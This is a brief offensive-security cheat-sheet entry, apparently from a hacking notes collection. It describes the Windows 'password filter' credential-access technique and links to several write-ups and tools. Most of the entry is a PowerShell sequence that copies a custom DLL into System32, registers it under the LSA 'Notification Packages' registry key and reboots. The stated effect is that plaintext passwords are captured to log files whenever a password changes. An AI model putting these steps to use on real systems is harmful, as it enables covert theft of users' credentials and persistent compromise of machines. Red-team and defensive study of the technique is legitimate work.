# Password Filter

* <https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/>
* <https://github.com/clymb3r/Misc-Windows-Hacking/tree/master/HookPasswordChange>
* <https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/>
* <https://github.com/3gstudent/PasswordFilter>

Abuse `PasswordChangeNotify` to load a custom DLL capturing plaintext credentials when a password change is performed (the passwords will appear in `C:\logFile?.txt` files):

```powershell
PS > $passwordFilterName = (Copy-Item "Win32Project3.dll" -Destination "C:\Windows\System32" -PassThru).basename
PS > $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
PS > $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
PS > $notificationPackagesValues += $passwordFilterName
PS > Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
PS > Restart-Computer -Confirm
```